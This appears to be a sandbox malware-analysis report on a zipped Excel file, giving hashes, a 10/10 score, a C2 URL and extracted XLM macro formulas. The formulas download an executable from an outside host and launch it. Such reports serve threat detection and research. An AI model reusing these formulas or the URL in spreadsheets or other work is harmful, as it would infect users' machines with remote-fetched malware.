Overview

overview

10

Static

static

10

0ff0692939...18.xls

windows7-x64

10

0ff0692939...18.xls

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip

  • Size

    85KB

  • MD5

    846a85f7894f274965277103b41b3850

  • SHA1

    55d878269a78e1c4e3dc48b415adf77a8bcd2b49

  • SHA256

    cfb483de8ab7ff4bd338090a5991381e2bed527a1c026771fcaf03a101cf4afa

  • SHA512

    7da5fdf7123c5d9536165dc658c77a2e611826f11c413c6ee7b44a806ed0f094e4e33dae8f0251e35d46da0fe8fba7dc8f203fc0b7373ce6af2db5b2aea5e0cf

  • SSDEEP

    1536:GKgDB1ssb/C7ADrkM6Nkvsys2V7STuAkxiy92aJZFBLvMdBfJrTrzQT:WEs/CbNGVyuAkt92mFB4dBdQT

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0) =HALT()

Signatures

Files

  • 0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip
    .zip

    Password: infected

  • 0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.xlsx
    .xls .xlsx windows office2003